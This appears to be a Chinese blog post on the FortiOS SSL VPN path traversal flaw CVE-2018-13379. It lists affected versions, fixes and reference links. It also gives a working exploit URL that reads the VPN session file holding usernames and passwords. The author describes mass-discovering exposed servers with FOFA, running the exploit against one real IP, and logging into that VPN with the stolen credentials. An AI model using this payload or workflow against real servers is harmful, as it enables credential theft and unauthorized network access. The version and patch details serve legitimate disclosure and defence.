早在2019年5月24日,飛塔官方就發布了CVE-2018-13379漏洞的安全公告,但直到8月份才有漏洞Exp流出,導致漏洞蔓延。
據官方介紹,CVE-2018-13379是SSL VPN中的一個目錄遍歷漏洞,該漏洞源於網絡系統或產品未能正確地過濾資源或文件路徑中的特殊元素,導致攻擊者可利用該漏洞訪問受限目錄之外的文件。
影響范圍:FortiOS/5.6.3 ~ 5.6.7、FortiOS/6.0.0 ~ 6.0.4
修復措施:更新至FortiOS 5.6.8,6.0.5或6.2.0
漏洞利用:
https://aaa.bbb.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
使用FOFA中搜索飛塔SSL VPN服務器,可以看到有15.3萬個獨立IP,搜索結果如下圖:
對某個IP進行測試,成功讀取session文件,該文件包含用戶名和密碼,如下圖所示:
利用某個用戶名和密碼成功登錄SSL VPN,如下圖所示:
GitHub上有一個Python腳本可以測試目標服務器是否存在CVE-2018-13379漏洞,GitHub項目:https://github.com/milo2012/CVE-2018-13379
參考鏈接:
https://fortiguard.com/psirt/FG-IR-18-384
https://www.securityfocus.com/bid/108693
https://nosec.org/home/detail/2862.html